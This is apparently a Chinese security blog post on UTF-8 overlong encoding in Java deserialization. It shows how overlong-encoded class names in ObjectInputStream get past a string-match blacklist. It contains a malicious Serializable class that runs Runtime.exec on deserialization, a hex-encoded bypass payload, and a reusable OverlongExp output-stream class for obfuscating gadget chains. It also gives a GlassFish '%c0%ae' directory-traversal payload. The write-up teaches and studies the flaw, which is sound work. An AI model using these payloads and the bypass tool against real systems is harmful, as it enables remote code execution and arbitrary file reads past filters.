UTF-8 Overlong Encoding · zIxyd's Blog

前言：

记录以下UTF-8 Overlong Encoding导致的安全问题;

参考: 1ue师傅;lzstar师傅；

UTF-8

UTF-8 就是一种变长的编码方式。它可以使用1~4个字节表示一个符号，根据不同的符号而变化字节长度

UTF-8 的编码规则:

对于单字节的符号，字节的第一位设为0，后面7位为这个符号的 Unicode 码。因此对于英语字母，UTF-8 编码和 ASCII 码是相同的。
对于n字节的符号（n > 1），第一个字节的前n位都设为1，第n + 1位设为0，后面字节的前两位一律设为10。剩下的没有提及的二进制位，全部为这个符号的 Unicode 码。

分析

假如有一个恶意类(如下)

package org.zIxyd;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.Serializable;

public class Calc implements Serializable {

    private String cmd;

    public Calc() {
    }

    public Calc(String cmd) {
        this.cmd = cmd;
    }


    private void readObject(ObjectInputStream ois) throws IOException, ClassNotFoundException {
        ois.defaultReadObject();
        Runtime.getRuntime().exec(this.cmd);
    }
}

如果存在一处代码，可以反序列化这个类，将会导致任意命令执行；

package org.zIxyd;
import java.io.*;

public class ExpTest {
    public static void main(String[] args) throws IOException, ClassNotFoundException {
        Calc calc = new Calc("calc");

        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(byteArrayOutputStream);
        oos.writeObject(calc);

        String string = byteArrayOutputStream.toString();
        System.out.println(string);

        BytetoHex(byteArrayOutputStream.toByteArray());

		//设置黑名单
        if (!string.contains("org.zIxyd.Calc")) {
            ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(byteArrayOutputStream.toByteArray()));
            ois.readObject();
        }else{
            System.out.println("Hacker!!!");
        }
    }

    public static void BytetoHex(byte[] bytes){
        StringBuilder hexString = new StringBuilder();
        for (byte b : bytes) {
            hexString.append(String.format("%02X", b));
        }
        System.out.println(hexString.toString());
    }
}

/*
输出为：
�� sr org.zIxyd.Calc��T��H)| L cmdt Ljava/lang/String;xpt calc
ACED00057372000E6F72672E7A497879642E43616C63BCF254BC9C48297C0200014C0003636D647400124C6A6176612F6C616E672F537472696E673B787074000463616C63
Hacker!!!
*/

但是这处代码有一层waf:!string.contains("Calc");

可以看到正常序列化时，序列化的数据会包含className;

接下来调试，看看反序列化时怎么拿到className的，1ue师傅已经给出了调用栈:

ObjectStreamClass#readNonProxy(ObjectInputStream in)
	ObjectInputStream#readUTF()
		BlockDataInputStream#readUTF()
			ObjectInputStream#readUTFBody(long utflen)
				ObjectInputStream#readUTFSpan(StringBuilder sbuf, long utflen)

最后是由ObjectInputStream类下的readUTFSpan方法；

private long readUTFSpan(StringBuilder sbuf, long utflen)
      throws IOException
  {
      int cpos = 0;
      int start = pos;
      int avail = Math.min(end - pos, CHAR_BUF_SIZE);
      // stop short of last char unless all of utf bytes in buffer
      int stop = pos + ((utflen > avail) ? avail - 2 : (int) utflen);
      boolean outOfBounds = false;

      try {
          while (pos < stop) {
              int b1, b2, b3;
              b1 = buf[pos++] & 0xFF;
              switch (b1 >> 4) {
                  case 0:
                  case 1:
                  case 2:
                  case 3:
                  case 4:
                  case 5:
                  case 6:
                  case 7:   // 1 byte format: 0xxxxxxx
                      cbuf[cpos++] = (char) b1;
                      break;

                  case 12:
                  case 13:  // 2 byte format: 110xxxxx 10xxxxxx
                      b2 = buf[pos++];
                      if ((b2 & 0xC0) != 0x80) {
                          throw new UTFDataFormatException();
                      }
                      cbuf[cpos++] = (char) (((b1 & 0x1F) << 6) |
                                             ((b2 & 0x3F) << 0));
                      break;

                  case 14:  // 3 byte format: 1110xxxx 10xxxxxx 10xxxxxx
                      b3 = buf[pos + 1];
                      b2 = buf[pos + 0];
                      pos += 2;
                      if ((b2 & 0xC0) != 0x80 || (b3 & 0xC0) != 0x80) {
                          throw new UTFDataFormatException();
                      }
                      cbuf[cpos++] = (char) (((b1 & 0x0F) << 12) |
                                             ((b2 & 0x3F) << 6) |
                                             ((b3 & 0x3F) << 0));
                      break;

                  default:  // 10xx xxxx, 1111 xxxx
                      throw new UTFDataFormatException();
              }
          }
      } catch (ArrayIndexOutOfBoundsException ex) {
          outOfBounds = true;
      } finally {
          if (outOfBounds || (pos - start) > utflen) {
              pos = start + (int) utflen;
              throw new UTFDataFormatException();
          }
      }

      sbuf.append(cbuf, 0, cpos);
      return pos - start;
  }

其中通过switch (b1 >> 4)来判断是:多少个字节为一个字符；

我这里的ClassName为：org.zIxyd.Calc第一个字符为o;其16进制为 0x6f；

根据代码逻辑，会走到处理一个字节对应一个字符的地方;即返回了 o 的char

1
2
3

case 7:   // 1 byte format: 0xxxxxxx
    cbuf[cpos++] = (char) b1;
    break;

但难道只有 1 byte format: 0xxxxxxx 时才能获取 o 字符串吗，其实不然，处理俩个字节为一个字符的逻辑和处理三个字节的逻辑都可以返回；

case 12:
case 13:  // 2 byte format: 110xxxxx 10xxxxxx
    b2 = buf[pos++];
    if ((b2 & 0xC0) != 0x80) {
        throw new UTFDataFormatException();
    }
    cbuf[cpos++] = (char) (((b1 & 0x1F) << 6) |
                           ((b2 & 0x3F) << 0));
    break;

这里以两个字节的为列；用python实现:输出一个字母对应的两个字节值

import string

b1 = int("11000000", 2)
while (b1 <= int("11011111", 2)):
    b2 = int("10000000", 2)
    while (b2 <= int("10111111", 2)):
        cha = chr(((b1 & 0x1F) << 6) | ((b2 & 0x3F) << 0))
        if (cha in string.ascii_lowercase):
            print(cha + " " + str(hex(b1)) + " : " + str(hex(b2)))
        if (cha in string.ascii_uppercase):
            print(cha + " " + str(hex(b1)) + " : " + str(hex(b2)))
        b2 = b2 + 1
    b1 = b1 + 1

其中可以得知o 0xc1 : 0xaf

现在将之前那段恶意的序列化十六进制数据，将6F改成C1AF，再次反序列化这段数据；

这里需要注意，因为ClassName多了一个字节，对应的长度也要改变；

package org.zIxyd;

import javax.xml.bind.DatatypeConverter;
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.io.ObjectInputStream;

public class CalcTest {
    public static void main(String[] args) throws IOException, ClassNotFoundException {

        String hexString = "ACED00057372000FC1AF72672E7A497879642E43616C63BCF254BC9C48297C0200014C0003636D647400124C6A6176612F6C616E672F537472696E673B787074000463616C63";
        byte[] byteArray = DatatypeConverter.parseHexBinary(hexString);

        byte[] bytes = hexStringToByteArray(hexString);
        String text = new String(bytes);

        System.out.println("转换后的字符串为：" + text);
        if (!text.contains("org.zIxyd.Calc")) {
            ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(byteArray));
            ois.readObject();
        }else{
            System.out.println("Hacker!!!");
        }
    }


    public static byte[] hexStringToByteArray(String hexString) {
        int len = hexString.length();
        byte[] data = new byte[len / 2];
        for (int i = 0; i < len; i += 2) {
            data[i / 2] = (byte) ((Character.digit(hexString.charAt(i), 16) << 4)
                    + Character.digit(hexString.charAt(i+1), 16));
        }
        return data;
    }
}

/*

输出为：
转换后的字符串为：�� sr ��rg.zIxyd.Calc��T��H)| L cmdt Ljava/lang/String;xpt calc
*/

可以看到o字符已经被混淆了；所以绕过了黑名单

Tools

漏洞分析完了；但是可以想到手动修改ClassName的字节太过麻烦；师傅们用的办法都是重写writeClassDescriptor方法，再加上将类名Overlong Encoding的逻辑(具体思路可以看看lzstar师傅)

然后看了一下评论，说重写writeUTF相比之下简单一点(确实简单不少);所以就有了下面这段代码：

import java.io.IOException;
import java.io.ObjectOutputStream;
import java.io.OutputStream;
import java.util.HashMap;

public class OverlongExp extends ObjectOutputStream {

    private static HashMap<Character, int[]> map;
    static {
        map = new HashMap<>();
        map.put('.', new int[]{0xc0, 0xae});
        map.put(';', new int[]{0xc0, 0xbb});
        map.put('$', new int[]{0xc0, 0xa4});
        map.put('[', new int[]{0xc1, 0x9b});
        map.put(']', new int[]{0xc1, 0x9d});
        map.put('_', new int[]{0xc1, 0x9f});
        map.put('a', new int[]{0xc1, 0xa1});
        map.put('b', new int[]{0xc1, 0xa2});
        map.put('c', new int[]{0xc1, 0xa3});
        map.put('d', new int[]{0xc1, 0xa4});
        map.put('e', new int[]{0xc1, 0xa5});
        map.put('f', new int[]{0xc1, 0xa6});
        map.put('g', new int[]{0xc1, 0xa7});
        map.put('h', new int[]{0xc1, 0xa8});
        map.put('i', new int[]{0xc1, 0xa9});
        map.put('j', new int[]{0xc1, 0xaa});
        map.put('k', new int[]{0xc1, 0xab});
        map.put('l', new int[]{0xc1, 0xac});
        map.put('m', new int[]{0xc1, 0xad});
        map.put('n', new int[]{0xc1, 0xae});
        map.put('o', new int[]{0xc1, 0xaf});
        map.put('p', new int[]{0xc1, 0xb0});
        map.put('q', new int[]{0xc1, 0xb1});
        map.put('r', new int[]{0xc1, 0xb2});
        map.put('s', new int[]{0xc1, 0xb3});
        map.put('t', new int[]{0xc1, 0xb4});
        map.put('u', new int[]{0xc1, 0xb5});
        map.put('v', new int[]{0xc1, 0xb6});
        map.put('w', new int[]{0xc1, 0xb7});
        map.put('x', new int[]{0xc1, 0xb8});
        map.put('y', new int[]{0xc1, 0xb9});
        map.put('z', new int[]{0xc1, 0xba});
        map.put('A', new int[]{0xc1, 0x81});
        map.put('B', new int[]{0xc1, 0x82});
        map.put('C', new int[]{0xc1, 0x83});
        map.put('D', new int[]{0xc1, 0x84});
        map.put('E', new int[]{0xc1, 0x85});
        map.put('F', new int[]{0xc1, 0x86});
        map.put('G', new int[]{0xc1, 0x87});
        map.put('H', new int[]{0xc1, 0x88});
        map.put('I', new int[]{0xc1, 0x89});
        map.put('J', new int[]{0xc1, 0x8a});
        map.put('K', new int[]{0xc1, 0x8b});
        map.put('L', new int[]{0xc1, 0x8c});
        map.put('M', new int[]{0xc1, 0x8d});
        map.put('N', new int[]{0xc1, 0x8e});
        map.put('O', new int[]{0xc1, 0x8f});
        map.put('P', new int[]{0xc1, 0x90});
        map.put('Q', new int[]{0xc1, 0x91});
        map.put('R', new int[]{0xc1, 0x92});
        map.put('S', new int[]{0xc1, 0x93});
        map.put('T', new int[]{0xc1, 0x94});
        map.put('U', new int[]{0xc1, 0x95});
        map.put('V', new int[]{0xc1, 0x96});
        map.put('W', new int[]{0xc1, 0x97});
        map.put('X', new int[]{0xc1, 0x98});
        map.put('Y', new int[]{0xc1, 0x99});
        map.put('Z', new int[]{0xc1, 0x9a});
    }

    public OverlongExp(OutputStream out) throws IOException {
        super(out);
    }

    public void writeUTF(String str) throws IOException {

        writeShort(str.length() * 2);
        for (int i = 0; i < str.length(); i++) {
            int[] bs = map.get(str.charAt(i));
            super.write(bs[0]);
            super.write(bs[1]);
        }
    }
}

对比一下混淆之前和混淆之后的CC5

总结

Overlong Encoding导致的安全问题不止局限于java反序列化中，例如：GlassFish在解码URL时，没有考虑UTF-8 Overlong Encoding攻击，导致将%c0%ae解析为ASCCII字符的.（点）。利用%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/来向上跳转，达到目录穿越、任意文件读取的效果。

最后贴一下p神写了一个简单的Python函数，用于将一个ASCII字符串转换成Overlong Encoding的UTF-8编码：

def convert_int(i: int) -> bytes:
    b1 = ((i >> 6) & 0b11111) | 0b11000000
    b2 = (i & 0b111111) | 0b10000000
    return bytes([b1, b2])


def convert_str(s: str) -> bytes:
    bs = b''
    for ch in s.encode():
        bs += convert_int(ch)

    return bs


if __name__ == '__main__':
    print(convert_str('.')) # b'\xc0\xae'
    print(convert_str('org.example.Evil'))